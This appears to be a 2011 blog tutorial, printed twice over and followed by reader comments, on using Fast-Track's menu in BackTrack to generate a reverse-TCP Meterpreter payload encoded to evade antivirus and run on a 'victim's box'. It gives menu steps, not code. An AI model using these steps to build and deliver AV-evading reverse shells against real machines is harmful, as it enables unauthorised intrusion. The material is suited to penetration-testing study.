We discussed Metasploit framework in a post and today in this tutorial we will be discussing about Fast-Track which is very easy to use as compared to metasploit as we will see later in the discussion.Here we will discuss how to generate payload using Fast-track from its menu driven interface.
What is Fast-Track?
It is an open-source project in python and brain child of David Kennedy to come in help during penetration testing with the blend of metasploit framework to make pen testing automated.It makes it very easy for pen testers to exploit the client side data ,improper patch management etc.It has dependencies on metasploit,SQLite,FreeTDS etc.It is advantageous as compared to metasploit beacuse of its very user friendly usage.
What is Payload?
It is actually the work of the exploit that is the result or effect.For example while using any exploit on a targeted box we may get the shell,VNC desktop or access to the files etc on the attacker box.
What is Shellcode?
It is the opcode(Operational code) that can be executed on the targeted box to get the command shell etc.It can be encoded to bypass antivirus detection.
Requirements:
1.Backtrack
2.Virtual environment software.(Vmware player/Virtual Box)
Learn how to boot Backtrack from USB
Learn how to use Virtual Environment
Procedure:
Step 1.
Boot backtrack and open a shell console and change the directory to " cd /pentest/exploits " and
type "python setup.py install" to check if fast-track has all dependancies install so that it will download from online as shown below.
Step 2.
Now type "python fask-track.py" inorder to select the desired interactive mode.Here I have selected the menu driven mode (./fast-track.py -i) as in this discussion we will be using that.
Step 3.
Now as I got the menu for fast-track usage in the screen, I selected no.6 that is "Payload Generator" as shown in the image below.
Step 4.
Now in this step we have to select the type of payload from the given menu,here I have selected "Reverse_Tcp Meterpreter" that is no.2 as shown in the image below.
Step 5.
Now we need to encode our payload inorder to bypass the AV ,here we have selected no.2 as shown in the image below.
Step 6.
Now we need to enter the host IpAddress and the desired port.Then select the form of payload that is "executable" or "shellcode" as shown in the image below.
Step 7.
As you can see the payload is being saved in .txt format so,we can get the shellcode from it.If we would have choosen the "executable" format then a .exe file would have been created.
Step 8.
If the .exe file is run in the victim's box and we have setup a listener then we can get the meterpreter seesion on our desktop as shown in the image below.
In the next post we will see how we can use the shellcode generated to make an executable.
If you find this post useful then do drop your comments it will be appreciated... :)
What is Fast-Track?
It is an open-source project in python and brain child of David Kennedy to come in help during penetration testing with the blend of metasploit framework to make pen testing automated.It makes it very easy for pen testers to exploit the client side data ,improper patch management etc.It has dependencies on metasploit,SQLite,FreeTDS etc.It is advantageous as compared to metasploit beacuse of its very user friendly usage.
What is Payload?
It is actually the work of the exploit that is the result or effect.For example while using any exploit on a targeted box we may get the shell,VNC desktop or access to the files etc on the attacker box.
What is Shellcode?
It is the opcode(Operational code) that can be executed on the targeted box to get the command shell etc.It can be encoded to bypass antivirus detection.
Requirements:
1.Backtrack
2.Virtual environment software.(Vmware player/Virtual Box)
Learn how to boot Backtrack from USB
Learn how to use Virtual Environment
Procedure:
Step 1.
Boot backtrack and open a shell console and change the directory to " cd /pentest/exploits " and
type "python setup.py install" to check if fast-track has all dependancies install so that it will download from online as shown below.
Step 2.
Now type "python fask-track.py" inorder to select the desired interactive mode.Here I have selected the menu driven mode (./fast-track.py -i) as in this discussion we will be using that.
Step 3.
Now as I got the menu for fast-track usage in the screen, I selected no.6 that is "Payload Generator" as shown in the image below.
Step 4.
Now in this step we have to select the type of payload from the given menu,here I have selected "Reverse_Tcp Meterpreter" that is no.2 as shown in the image below.
Step 5.
Now we need to encode our payload inorder to bypass the AV ,here we have selected no.2 as shown in the image below.
Step 6.
Now we need to enter the host IpAddress and the desired port.Then select the form of payload that is "executable" or "shellcode" as shown in the image below.
Step 7.
As you can see the payload is being saved in .txt format so,we can get the shellcode from it.If we would have choosen the "executable" format then a .exe file would have been created.
Step 8.
If the .exe file is run in the victim's box and we have setup a listener then we can get the meterpreter seesion on our desktop as shown in the image below.
If you find this post useful then do drop your comments it will be appreciated... :)
Fast-Track Tutorial for Beginners | Payload Generation
Reviewed by Satyajit (Admins,a.k.a Satosys)
on
Friday, January 28, 2011
Rating:
25 comments:
Very good work yar. Keep it up :)
@Aneesh Thanks for the comment :) Keep visting.
keep up the good work!
very clear tutorial. thank for sharing this tutorial. I am waiting your other post :)
Good post it is good i like your blog
This tutorial was very enlightening for me, thanks!
I think it is a useful post for beginners in this program, but not only, it can remind basic things even to those who have some experience already. Good work.
Thank You for the Post.It is very useful for me.I was looking for this kind of post.
This tutorial is very impresive..very informative to me..thank u very much
dude ur post r fine and simple ....better than prohack....but lack content
plz try to include more ...contentz....thankz for this
Hats off to the one who has made backtrack. I am not familiar with this but I can hack WEP key with backtrack just I have noted the commands.
Excellent review. Thanks for sharing mate!
Nice post. I worked with Fast-Track for my senior design project, had a lot of fun with it
very good work.Thanks
thank for share, i use for my site
Its awesome must give a try thanks for giving a great tutorial
Nice and great article! Im looking forward to read more of your article…Good job.
@Praneesh Thanks for your appreciation.... Prohack is a good site too. :)
Yes I will surely come up with interesting contents soon.
Keep visting... :)
Wow! This is super exciting and fun.
Thank you so much for this tutorial.. I can't wait to read more hacking tips and tricks on the next weeks. :D
Excellent info once again. Thumbs up.
Very interesting topics here in your site mate. Can't wait to read more of your blogs. Just keep it coming.
I'm glad that I stumble upon your site. I'll keep reading. Thank you.
good
i found this site very informative
thank you
Great article,
you live and learn.
Thanks
Deon